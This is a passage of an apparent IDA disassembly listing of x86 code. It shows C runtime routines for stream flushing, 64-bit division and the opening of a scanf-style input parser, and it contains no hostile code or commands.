		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_408ECE
		push	eax
		call	sub_40F19E
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_408F30
		push	[ebp+arg_0]
		call	sub_408DFD
		pop	ecx
		mov	[ebp+var_1C], eax
		jmp	short loc_408F3F
; ---------------------------------------------------------------------------

loc_408F30:				; CODE XREF: sub_408E91+8Fj
		call	sub_405B83
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_408F3F:				; CODE XREF: sub_408E91+9Dj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_408F54
		mov	eax, [ebp+var_1C]

loc_408F4E:				; CODE XREF: sub_408E91+2Aj
		call	__SEH_epilog4
		retn
sub_408E91	endp


; =============== S U B	R O U T	I N E =======================================



sub_408F54	proc near		; CODE XREF: sub_408E91+B5p
					; DATA XREF: _1fieagrn:004218A0o
		push	dword ptr [ebp+8]
		call	sub_40F23E
		pop	ecx
		retn
sub_408F54	endp


; =============== S U B	R O U T	I N E =======================================



sub_408F5E	proc near		; CODE XREF: sub_403811+3Cp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	short loc_408F88
		test	al, 8
		jz	short loc_408F88
		push	dword ptr [esi+8]
		call	sub_4039C3
		and	dword ptr [esi+0Ch], 0FFFFFBF7h
		xor	eax, eax
		pop	ecx
		mov	[esi], eax
		mov	[esi+8], eax
		mov	[esi+4], eax

loc_408F88:				; CODE XREF: sub_408F5E+Aj
					; sub_408F5E+Ej
		pop	esi
		retn
sub_408F5E	endp


; =============== S U B	R O U T	I N E =======================================



sub_408F8A	proc near		; CODE XREF: sub_403811+34p
					; sub_408B61+15p ...

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		mov	eax, [esi+0Ch]
		mov	ecx, eax
		and	cl, 3
		xor	ebx, ebx
		cmp	cl, 2
		jnz	short loc_408FDE
		test	ax, 108h
		jz	short loc_408FDE
		mov	eax, [esi+8]
		push	edi
		mov	edi, [esi]
		sub	edi, eax
		test	edi, edi
		jle	short loc_408FDD
		push	edi
		push	eax
		push	esi
		call	sub_408DD0
		pop	ecx
		push	eax
		call	sub_40D7D0
		add	esp, 0Ch
		cmp	eax, edi
		jnz	short loc_408FD6
		mov	eax, [esi+0Ch]
		test	al, al
		jns	short loc_408FDD
		and	eax, 0FFFFFFFDh
		mov	[esi+0Ch], eax
		jmp	short loc_408FDD
; ---------------------------------------------------------------------------

loc_408FD6:				; CODE XREF: sub_408F8A+3Bj
		or	dword ptr [esi+0Ch], 20h
		or	ebx, 0FFFFFFFFh

loc_408FDD:				; CODE XREF: sub_408F8A+25j
					; sub_408F8A+42j ...
		pop	edi

loc_408FDE:				; CODE XREF: sub_408F8A+13j
					; sub_408F8A+19j
		mov	eax, [esi+8]
		and	dword ptr [esi+4], 0
		mov	[esi], eax
		pop	esi
		mov	eax, ebx
		pop	ebx
		retn
sub_408F8A	endp


; =============== S U B	R O U T	I N E =======================================



sub_408FEC	proc near		; CODE XREF: sub_40902E+69p
					; sub_40902E+84p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jnz	short loc_408FFE
		push	esi
		call	sub_40902E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_408FFE:				; CODE XREF: sub_408FEC+7j
		push	esi
		call	sub_408F8A
		test	eax, eax
		pop	ecx
		jz	short loc_40900E
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40900E:				; CODE XREF: sub_408FEC+1Bj
		test	word ptr [esi+0Ch], 4000h
		jz	short loc_40902A
		push	esi
		call	sub_408DD0
		push	eax
		call	sub_40F3FF
		pop	ecx
		pop	ecx
		neg	eax
		sbb	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40902A:				; CODE XREF: sub_408FEC+28j
		xor	eax, eax
		pop	esi
		retn
sub_408FEC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40902E	proc near		; CODE XREF: sub_408FEC+Ap
					; sub_409108+2p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 004090E1 SIZE 0000001E BYTES

		push	14h
		push	offset dword_4218A8
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_24], edi
		push	1
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		xor	esi, esi

loc_40904F:				; CODE XREF: sub_40902E+9Bj
		mov	[ebp+var_20], esi
		cmp	esi, dword_436420
		jge	loc_4090E1
		mov	eax, dword_435400
		lea	eax, [eax+esi*4]
		cmp	[eax], edi
		jz	short loc_4090C8
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_4090C8
		push	eax
		push	esi
		call	sub_40853A
		pop	ecx
		pop	ecx
		xor	edx, edx
		inc	edx
		mov	[ebp+ms_exc.disabled], edx
		mov	eax, dword_435400
		mov	eax, [eax+esi*4]
		mov	ecx, [eax+0Ch]
		test	cl, 83h
		jz	short loc_4090C0
		cmp	[ebp+arg_0], edx
		jnz	short loc_4090A7
		push	eax
		call	sub_408FEC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4090C0
		inc	[ebp+var_1C]
		jmp	short loc_4090C0
; ---------------------------------------------------------------------------

loc_4090A7:				; CODE XREF: sub_40902E+66j
		cmp	[ebp+arg_0], edi
		jnz	short loc_4090C0
		test	cl, 2
		jz	short loc_4090C0
		push	eax
		call	sub_408FEC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4090C0
		or	[ebp+var_24], eax

loc_4090C0:				; CODE XREF: sub_40902E+61j
					; sub_40902E+72j ...
		mov	[ebp+ms_exc.disabled], edi
		call	sub_4090D0

loc_4090C8:				; CODE XREF: sub_40902E+3Aj
					; sub_40902E+42j
		inc	esi
		jmp	short loc_40904F
sub_40902E	endp

; ---------------------------------------------------------------------------
		xor	edi, edi
		mov	esi, [ebp-20h]

; =============== S U B	R O U T	I N E =======================================



sub_4090D0	proc near		; CODE XREF: sub_40902E+95p
		mov	eax, dword_435400
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40858C
		pop	ecx
		pop	ecx
		retn
sub_4090D0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40902E

loc_4090E1:				; CODE XREF: sub_40902E+2Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4090FF
		cmp	[ebp+arg_0], 1
		mov	eax, [ebp+var_1C]
		jz	short loc_4090F9
		mov	eax, [ebp+var_24]

loc_4090F9:				; CODE XREF: sub_40902E+C6j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40902E

; =============== S U B	R O U T	I N E =======================================



sub_4090FF	proc near		; CODE XREF: sub_40902E+BAp
					; DATA XREF: _1fieagrn:004218C0o
		push	1
		call	sub_405CCF
		pop	ecx
		retn
sub_4090FF	endp


; =============== S U B	R O U T	I N E =======================================



sub_409108	proc near		; CODE XREF: sub_4084EBp
		push	1
		call	sub_40902E
		pop	ecx
		retn
sub_409108	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_409120	proc near		; CODE XREF: sub_403900+29p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		mov	eax, [esp+8+arg_C]
		or	eax, eax
		jnz	short loc_409142
		mov	ecx, [esp+8+arg_8]
		mov	eax, [esp+8+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+8+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_409183
; ---------------------------------------------------------------------------

loc_409142:				; CODE XREF: sub_409120+8j
		mov	ecx, eax
		mov	ebx, [esp+8+arg_8]
		mov	edx, [esp+8+arg_4]
		mov	eax, [esp+8+arg_0]

loc_409150:				; CODE XREF: sub_409120+3Aj
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_409150
		div	ebx
		mov	esi, eax
		mul	[esp+8+arg_C]
		mov	ecx, eax
		mov	eax, [esp+8+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40917E
		cmp	edx, [esp+8+arg_4]
		ja	short loc_40917E
		jb	short loc_40917F
		cmp	eax, [esp+8+arg_0]
		jbe	short loc_40917F

loc_40917E:				; CODE XREF: sub_409120+4Ej
					; sub_409120+54j
		dec	esi

loc_40917F:				; CODE XREF: sub_409120+56j
					; sub_409120+5Cj
		xor	edx, edx
		mov	eax, esi

loc_409183:				; CODE XREF: sub_409120+20j
		pop	esi
		pop	ebx
		retn	10h
sub_409120	endp


; =============== S U B	R O U T	I N E =======================================



sub_409188	proc near		; CODE XREF: sub_409217+3CDp
					; sub_409217+447p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esi]
		cmp	[esp+arg_0], eax
		jnz	short loc_4091D8
		mov	ecx, [edi]
		cmp	ecx, [esp+arg_4]
		push	2
		push	eax
		jnz	short loc_4091C7
		call	sub_407B2A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jnz	short loc_4091AB

loc_4091A8:				; CODE XREF: sub_409188+4Aj
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4091AB:				; CODE XREF: sub_409188+1Ej
		mov	eax, [esp+arg_8]
		mov	dword ptr [eax], 1
		push	dword ptr [esi]
		push	[esp+4+arg_4]
		push	dword ptr [edi]
		call	sub_407FA0
		add	esp, 0Ch
		jmp	short loc_4091D6
; ---------------------------------------------------------------------------

loc_4091C7:				; CODE XREF: sub_409188+11j
		push	ecx
		call	sub_407BBD
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_4091A8
		mov	[edi], eax

loc_4091D6:				; CODE XREF: sub_409188+3Dj
		shl	dword ptr [esi], 1

loc_4091D8:				; CODE XREF: sub_409188+6j
		xor	eax, eax
		inc	eax
		retn
sub_409188	endp


; =============== S U B	R O U T	I N E =======================================



sub_4091DC	proc near		; CODE XREF: sub_4091F2+7p
					; sub_409217+2E1p ...
		dec	dword ptr [edx+4]
		js	short loc_4091EA
		mov	ecx, [edx]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[edx], ecx
		retn
; ---------------------------------------------------------------------------

loc_4091EA:				; CODE XREF: sub_4091DC+3j
		push	edx
		call	sub_40A03D
		pop	ecx
		retn
sub_4091DC	endp


; =============== S U B	R O U T	I N E =======================================



sub_4091F2	proc near		; CODE XREF: sub_409217+14Fp
					; sub_409217+2D3p

arg_0		= dword	ptr  4

		push	ebx

loc_4091F3:				; CODE XREF: sub_4091F2+1Fj
		mov	edx, [esp+4+arg_0]
		inc	dword ptr [esi]
		call	sub_4091DC
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409213
		movzx	eax, bl
		push	eax
		call	sub_40F626
		test	eax, eax
		pop	ecx
		jnz	short loc_4091F3

loc_409213:				; CODE XREF: sub_4091F2+11j
		mov	eax, ebx
		pop	ebx
		retn
sub_4091F2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=18Ch


sub_409217	proc near		; DATA XREF: sub_4039A4+10o

var_1FC		= dword	ptr -1FCh
var_1F8		= dword	ptr -1F8h
var_1F0		= dword	ptr -1F0h
var_1EC		= byte ptr -1ECh
var_1E8		= dword	ptr -1E8h
var_1E4		= dword	ptr -1E4h
var_1E0		= dword	ptr -1E0h
var_1DC		= byte ptr -1DCh
var_1DB		= byte ptr -1DBh
var_1D8		= dword	ptr -1D8h
var_1D4		= dword	ptr -1D4h
var_1D0		= dword	ptr -1D0h
var_1C9		= byte ptr -1C9h
var_1C8		= dword	ptr -1C8h
var_1C4		= dword	ptr -1C4h
var_1C0		= dword	ptr -1C0h
var_1BC		= dword	ptr -1BCh
var_1B8		= dword	ptr -1B8h
var_1B4		= dword	ptr -1B4h
var_1B0		= dword	ptr -1B0h
var_1AC		= dword	ptr -1ACh
var_1A8		= dword	ptr -1A8h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_1A2		= byte ptr -1A2h
var_1A1		= byte ptr -1A1h
var_1A0		= dword	ptr -1A0h
var_19A		= byte ptr -19Ah
var_199		= byte ptr -199h
var_198		= dword	ptr -198h
var_191		= byte ptr -191h
var_190		= dword	ptr -190h
var_189		= byte ptr -189h
var_188		= dword	ptr -188h
var_184		= byte ptr -184h
var_24		= byte ptr -24h
var_19		= byte ptr -19h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-18Ch]
		sub	esp, 1FCh
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+18Ch+var_4], eax
		mov	eax, [ebp+18Ch+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+18Ch+arg_0]
		xor	ebx, ebx
		push	edi
		mov	edi, [ebp+18Ch+arg_4]
		cmp	edi, ebx
		mov	[ebp+18Ch+var_1E4], eax
		lea	eax, [ebp+18Ch+var_184]
		mov	[ebp+18Ch+var_1A0], esi
		mov	[ebp+18Ch+var_1B4], edi
		mov	[ebp+18Ch+var_1B0], eax
		mov	[ebp+18Ch+var_1D8], 15Eh
		mov	[ebp+18Ch+var_1D0], ebx
		mov	[ebp+18Ch+var_1E8], ebx
		mov	[ebp+18Ch+var_190], ebx
		jnz	short loc_40928C

loc_40926C:				; CODE XREF: sub_409217+77j
					; sub_409217+C6j ...
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_409E4C
; ---------------------------------------------------------------------------

loc_40928C:				; CODE XREF: sub_409217+53j
		cmp	esi, ebx
		jz	short loc_40926C
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_40932B
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_4092D4
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_4092D4
		push	esi
		call	sub_408DD0
		sar	eax, 5
		push	esi
		lea	edi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_4092D9
; ---------------------------------------------------------------------------

loc_4092D4:				; CODE XREF: sub_409217+8Dj
					; sub_409217+99j
		mov	eax, offset dword_423BD0

loc_4092D9:				; CODE XREF: sub_409217+BBj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40926C
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_409319
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_409319
		push	esi
		call	sub_408DD0
		sar	eax, 5
		push	esi
		lea	edi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40931E
; ---------------------------------------------------------------------------

loc_409319:				; CODE XREF: sub_409217+D2j
					; sub_409217+DEj
		mov	eax, offset dword_423BD0

loc_40931E:				; CODE XREF: sub_409217+100j
		test	byte ptr [eax+24h], 80h
		jnz	loc_40926C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40932B:				; CODE XREF: sub_409217+7Dj
		push	[ebp+18Ch+arg_8]
		lea	ecx, [ebp+18Ch+var_1F8]
		call	sub_402ADF
		mov	al, [edi]
		test	al, al
		mov	[ebp+18Ch+var_1A1], bl
		mov	[ebp+18Ch+var_188], ebx
		mov	[ebp+18Ch+var_1C8], ebx
		jz	loc_409E3C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40934F:				; CODE XREF: sub_409217+BC2j
		movzx	eax, al
		push	eax
		call	sub_40F626
		test	eax, eax
		pop	ecx
		jz	short loc_409390
		push	[ebp+18Ch+var_1A0]
		dec	[ebp+18Ch+var_188]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_4091F2
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40937C
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_40937C:				; CODE XREF: sub_409217+158j
					; sub_409217+172j
		inc	edi
		movzx	eax, byte ptr [edi]
		push	eax
		call	sub_40F626
		test	eax, eax
		pop	ecx
		jnz	short loc_40937C
		jmp	loc_409DD5
; ---------------------------------------------------------------------------

loc_409390:				; CODE XREF: sub_409217+144j
		cmp	byte ptr [edi],	25h
		jnz	loc_409D7D
		xor	eax, eax
		mov	[ebp+18Ch+var_1E0], eax
		mov	[ebp+18Ch+var_1C9], al
		mov	[ebp+18Ch+var_1A8], eax
		mov	[ebp+18Ch+var_1B8], eax
		mov	[ebp+18Ch+var_198], eax
		mov	[ebp+18Ch+var_1A4], al
		mov	[ebp+18Ch+var_1A3], al
		mov	[ebp+18Ch+var_199], al
		mov	[ebp+18Ch+var_189], al
		mov	[ebp+18Ch+var_1A2], al
		mov	[ebp+18Ch+var_191], al
		mov	[ebp+18Ch+var_19A], 1
		mov	[ebp+18Ch+var_1D4], eax
		xor	esi, esi

loc_4093C5:				; CODE XREF: sub_409217+279j
		inc	edi
		movzx	ebx, byte ptr [edi]
		movzx	eax, bl
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jz	short loc_4093EC
		mov	eax, [ebp+18Ch+var_198]
		inc	[ebp+18Ch+var_1B8]
		imul	eax, 0Ah
		lea	eax, [eax+ebx-30h]
		mov	[ebp+18Ch+var_198], eax
		jmp	loc_40948C
; ---------------------------------------------------------------------------

loc_4093EC:				; CODE XREF: sub_409217+1BEj
		cmp	ebx, 4Eh
		jg	short loc_409462
		jz	loc_40948C
		cmp	ebx, 2Ah
		jz	short loc_40945D
		cmp	ebx, 46h
		jz	loc_40948C
		cmp	ebx, 49h
		jz	short loc_409414
		cmp	ebx, 4Ch
		jnz	short loc_409471
		inc	[ebp+18Ch+var_19A]
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409414:				; CODE XREF: sub_409217+1F1j
		mov	cl, [edi+1]
		cmp	cl, 36h
		jnz	short loc_409431
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	34h
		jnz	short loc_409431

loc_409424:				; CODE XREF: sub_409217+265j
		inc	[ebp+18Ch+var_1D4]
		mov	edi, eax
		mov	[ebp+18Ch+var_1C0], esi
		mov	[ebp+18Ch+var_1BC], esi
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409431:				; CODE XREF: sub_409217+203j
					; sub_409217+20Bj
		cmp	cl, 33h
		jnz	short loc_409442
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	32h
		jnz	short loc_409442
		mov	edi, eax
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409442:				; CODE XREF: sub_409217+21Dj
					; sub_409217+225j
		cmp	cl, 64h
		jz	short loc_40948C
		cmp	cl, 69h
		jz	short loc_40948C
		cmp	cl, 6Fh
		jz	short loc_40948C
		cmp	cl, 78h
		jz	short loc_40948C
		cmp	cl, 58h
		jnz	short loc_409471
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_40945D:				; CODE XREF: sub_409217+1E3j
		inc	[ebp+18Ch+var_199]
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409462:				; CODE XREF: sub_409217+1D8j
		cmp	ebx, 68h
		jz	short loc_409486
		cmp	ebx, 6Ch
		jz	short loc_409476
		cmp	ebx, 77h
		jz	short loc_409481

loc_409471:				; CODE XREF: sub_409217+1F6j
					; sub_409217+242j
		inc	[ebp+18Ch+var_189]
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409476:				; CODE XREF: sub_409217+253j
		lea	eax, [edi+1]
		cmp	byte ptr [eax],	6Ch
		jz	short loc_409424
		inc	[ebp+18Ch+var_19A]

loc_409481:				; CODE XREF: sub_409217+258j
		inc	[ebp+18Ch+var_191]
		jmp	short loc_40948C
; ---------------------------------------------------------------------------

loc_409486:				; CODE XREF: sub_409217+24Ej
		dec	[ebp+18Ch+var_19A]
		dec	[ebp+18Ch+var_191]

loc_40948C:				; CODE XREF: sub_409217+1D0j
					; sub_409217+1DAj ...
		cmp	[ebp+18Ch+var_189], 0
		jz	loc_4093C5
		cmp	[ebp+18Ch+var_199], 0
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_4094AD
		mov	eax, [ebp+18Ch+var_1E4]
		mov	esi, [eax]
		mov	[ebp+18Ch+var_1FC], eax
		add	eax, 4
		mov	[ebp+18Ch+var_1E4], eax

loc_4094AD:				; CODE XREF: sub_409217+286j
		cmp	[ebp+18Ch+var_191], 0
		mov	[ebp+18Ch+var_1C4], esi
		mov	[ebp+18Ch+var_189], 0
		jnz	short loc_4094CC
		mov	al, [edi]
		cmp	al, 53h
		jz	short loc_4094C8
		cmp	al, 43h
		mov	[ebp+18Ch+var_191], 0FFh
		jnz	short loc_4094CC

loc_4094C8:				; CODE XREF: sub_409217+2A7j
		mov	[ebp+18Ch+var_191], 1

loc_4094CC:				; CODE XREF: sub_409217+2A1j
					; sub_409217+2AFj
		movzx	ebx, byte ptr [edi]
		or	ebx, 20h
		cmp	ebx, 6Eh
		mov	[ebp+18Ch+var_1AC], ebx
		jz	short loc_40950F
		cmp	ebx, 63h
		jz	short loc_4094F2
		cmp	ebx, 7Bh
		jz	short loc_4094F2
		push	[ebp+18Ch+var_1A0]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_4091F2
		pop	ecx
		jmp	short loc_4094FD
; ---------------------------------------------------------------------------

loc_4094F2:				; CODE XREF: sub_409217+2C6j
					; sub_409217+2CBj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC

loc_4094FD:				; CODE XREF: sub_409217+2D9j
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_409E09
		mov	esi, [ebp+18Ch+var_1C4]
		mov	edi, [ebp+18Ch+var_1B4]

loc_40950F:				; CODE XREF: sub_409217+2C1j
		mov	ecx, [ebp+18Ch+var_1B8]
		test	ecx, ecx
		jz	short loc_409520
		cmp	[ebp+18Ch+var_198], 0
		jz	loc_409DE1

loc_409520:				; CODE XREF: sub_409217+2FDj
		cmp	ebx, 6Fh
		jg	loc_40992C
		jz	loc_409B57
		cmp	ebx, 63h
		jz	loc_40981E
		push	64h
		pop	eax
		cmp	ebx, eax
		jz	loc_409B57
		jle	loc_409956
		cmp	ebx, 67h
		jle	short loc_409586
		cmp	ebx, 69h
		jz	short loc_40956E
		cmp	ebx, 6Eh
		jnz	loc_409956
		cmp	[ebp+18Ch+var_199], 0
		mov	edi, [ebp+18Ch+var_188]
		jz	loc_409D51
		jmp	loc_409D71
; ---------------------------------------------------------------------------

loc_40956E:				; CODE XREF: sub_409217+33Aj
		mov	[ebp+18Ch+var_1AC], eax

loc_409571:				; CODE XREF: sub_409217+734j
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	loc_409A3F
		mov	[ebp+18Ch+var_1A3], 1
		jmp	loc_409A44
; ---------------------------------------------------------------------------

loc_409586:				; CODE XREF: sub_409217+335j
		xor	ebx, ebx
		cmp	[ebp+18Ch+var_190], 2Dh
		jnz	short loc_409597
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [eax],	2Dh
		inc	ebx
		jmp	short loc_40959D
; ---------------------------------------------------------------------------

loc_409597:				; CODE XREF: sub_409217+375j
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_4095AE

loc_40959D:				; CODE XREF: sub_409217+37Ej
		dec	[ebp+18Ch+var_198]
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_190], eax

loc_4095AE:				; CODE XREF: sub_409217+384j
		cmp	[ebp+18Ch+var_1B8], 0
		jnz	short loc_4095B8
		or	[ebp+18Ch+var_198], 0FFFFFFFFh

loc_4095B8:				; CODE XREF: sub_409217+39Bj
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_409605
; ---------------------------------------------------------------------------

loc_4095BE:				; CODE XREF: sub_409217+3F7j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_409610
		mov	al, byte ptr [ebp+18Ch+var_190]
		mov	ecx, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_409605:				; CODE XREF: sub_409217+3A5j
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jnz	short loc_4095BE

loc_409610:				; CODE XREF: sub_409217+3AFj
		mov	eax, [ebp+18Ch+var_1F8]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		cmp	al, byte ptr [ebp+18Ch+var_190]
		mov	[ebp+18Ch+var_1A4], al
		jnz	loc_4096C6
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4096C6
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ecx, [ebp+18Ch+var_1B0]
		mov	[ebp+18Ch+var_190], eax
		mov	al, [ebp+18Ch+var_1A4]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4096BB
; ---------------------------------------------------------------------------

loc_409674:				; CODE XREF: sub_409217+4ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4096C6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4096BB:				; CODE XREF: sub_409217+45Bj
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jnz	short loc_409674

loc_4096C6:				; CODE XREF: sub_409217+40Cj
					; sub_409217+41Aj ...
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_4097C6
		cmp	[ebp+18Ch+var_190], 65h
		jz	short loc_4096E0
		cmp	[ebp+18Ch+var_190], 45h
		jnz	loc_4097C6

loc_4096E0:				; CODE XREF: sub_409217+4BDj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4097C6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 65h
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		cmp	eax, 2Dh
		mov	[ebp+18Ch+var_190], eax
		jnz	short loc_40974B
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 2Dh
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		jmp	short loc_409751
; ---------------------------------------------------------------------------

loc_40974B:				; CODE XREF: sub_409217+50Fj
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_40976E

